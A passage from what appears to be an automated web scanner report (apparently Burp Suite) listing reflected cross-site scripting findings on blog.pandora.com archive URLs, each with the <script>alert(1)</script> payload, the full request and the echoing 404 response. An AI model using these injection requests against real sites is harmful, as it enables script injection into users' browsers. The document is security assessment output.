Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ was not found on this server.</p>
...[SNIP]...

3.215. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3275c<script>alert(1)</script>7f101df09f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ was not found on this server.</p>
...[SNIP]...

3.216. http://blog.pandora.com/pandora/archives/2009/08/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48254<script>alert(1)</script>063e227bb42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ was not found on this server.</p>
...[SNIP]...

3.217. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee644<script>alert(1)</script>e5f841d0237 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ was not found on this server.</p>
...[SNIP]...

3.218. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da5b9<script>alert(1)</script>ee09fe65134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ was not found on this server.</p>
...[SNIP]...

3.219. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload caeac<script>alert(1)</script>9cab335ec9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ was not found on this server.</p>
...[SNIP]...

3.220. http://blog.pandora.com/pandora/archives/2009/09/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f8a9<script>alert(1)</script>cdadd2e3fba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ was not found on this server.</p>
...[SNIP]...

3.221. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a732<script>alert(1)</script>04358b3b570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ was not found on this server.</p>
...[SNIP]...

3.222. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb43c<script>alert(1)</script>796ed772059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ was not found on this server.</p>
...[SNIP]...

3.223. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad1ff<script>alert(1)</script>c05ada4297f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ was not found on this server.</p>
...[SNIP]...

3.224. http://blog.pandora.com/pandora/archives/2009/10/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241d1<script>alert(1)</script>0051722519f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/10241d1<script>alert(1)</script>0051722519f/ was not found on this server.</p>
...[SNIP]...

3.225. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 47148<script>alert(1)</script>a7a6b182afd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora47148<script>alert(1)</script>a7a6b182afd/archives/2009/11/ was not found on this server.</p>
...[SNIP]...

3.226. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f6439<script>alert(1)</script>47ec2e2aa5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:55 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf6439<script>alert(1)</script>47ec2e2aa5b/2009/11/ was not found on this server.</p>
...[SNIP]...

3.227. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0786<script>alert(1)</script>1fdd8212aca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009a0786<script>alert(1)</script>1fdd8212aca/11/ was not found on this server.</p>
...[SNIP]...

3.228. http://blog.pandora.com/pandora/archives/2009/11/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e31a9<script>alert(1)</script>92fb96256a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/11e31a9<script>alert(1)</script>92fb96256a/ was not found on this server.</p>
...[SNIP]...

3.229. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 55536<script>alert(1)</script>68fbf40c4c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora55536<script>alert(1)</script>68fbf40c4c1/archives/2009/12/ was not found on this server.</p>
...[SNIP]...

3.230. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5c021<script>alert(1)</script>00e0120b037 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5c021<script>alert(1)</script>00e0120b037/2009/12/ was not found on this server.</p>
...[SNIP]...

3.231. http://blog.pandora.com/pandora/archives/2009/12/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2009/12/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7c9b0<script>alert(1)</script>b9522db024f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20097c9b0<script>alert(1)</script>b9522db024f/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
